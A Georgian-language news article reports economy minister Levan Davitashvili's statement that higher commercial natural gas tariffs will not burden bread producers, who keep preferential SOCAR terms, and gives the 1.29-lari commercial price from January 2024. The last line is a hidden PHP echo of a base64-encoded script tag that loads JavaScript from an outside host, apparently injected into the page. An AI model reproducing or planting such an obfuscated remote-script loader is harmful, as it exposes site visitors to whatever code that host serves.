celsiusi
ავერსი საქკაბელი

არასაყოფაცხოვრებო მომხმარებლებისთვის ბუნებრივი აირის  გადასახადის გაზრდა შეეხებათ თუ არა პურის საწარმოებს - ამ კითხვაზე საპასუხოდ ეკონომიკისა და მდგრადი განვითარების მინისტრმა ლევან დავითაშვილმა მთავრობის სხდომის დასრულების შემდეგ გამართულ პრესკონფერენციაზე ისაუბრა.

"კომერციული სექტორის ტარიფები დაკავშირებულია ნახშირწყალბადების საერთაშორისო ფასებზე და კონკრეტული ფორმულით იანგარიშება, პერიოდულად კომერციული სექტორის გაზის ტარიფის გადახედვა ხდება ხოლმე, იმის მიხედვით, თუ როგორია საბირჟო ფასები. ბოლოს ნავთობპროდუქტებზე ფასები იზრდებოდა და ეს გარკვეულწილად გაზის კომერციულ ტარიფზეც აისახება ხოლმე, აქედან გამომდინარე, მოხდა ამ ინფორმაციის საჯაროდ გავრცელება კომერციული სექტორისთვის. რაც შეეხება კონკრეტული სტრატეგიული ობიექტებისთვის პრეფერენცირებული პირობების შენარჩუნებას, ამაზე ყოველთვის გვაქვს დიალოგი ჩვენ პარტნიორთან სოკართან, რომელიც მთავარი მომწოდებელია, ის ითვალისწინებს ამ სექტორის გარკვეულ მნიშვნელობას და განსხვავებული პირობებით სთავაზობს გაზის ტარიფს. ამასთან დაკავშირებით შეთანხმება გვაქვს, რომელიც ძალაში დარჩება, ეს პურის მცხობელი კომპანიებისთვის ზედმეტი წნეხი არ უნდა იყოს. განსხვავებული პირობა პურის საწარმოებისთვის შენარჩუნებული იქნება", - დასძინა მან.

შეგახსენებთ, რომ რეგიონებში არასაყოფაცხოვრებო მომხმარებლებისთვის ბუნებრივი აირი ძვირდება. "სოკარ ჯორჯია გაზი", "საქორგაზი" და "თელავიგაზი" კომერციულ მომხმარებლებს ტარიფების ცვლილებაზე ატყობინებენ. 2024 წლის 1 იანვრიდან „სოკარ ჯორჯია გაზისა“ და „საქორგგაზის“ კომერციული მომხმარებლისთვის 1მ³ ბუნებრივი გაზის ფასი განისაზღვრება 1,29 ლარით დღგ-ს ჩათვლით. ასევე დღგ-ს ჩათვლით 1.29 ლარით განისაზღვრა "თელავგაზის" ტარიფი კომერციული მომხმარებლისთვის.

უცვლელი რჩება საყოფაცხოვრებო ტარიფი, რომელიც საქართველოს ენერგეტიკისა და წყალმომარაგების მარეგულირებელი ეროვნული კომისიის მიერ არის დადგენილი.

221
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");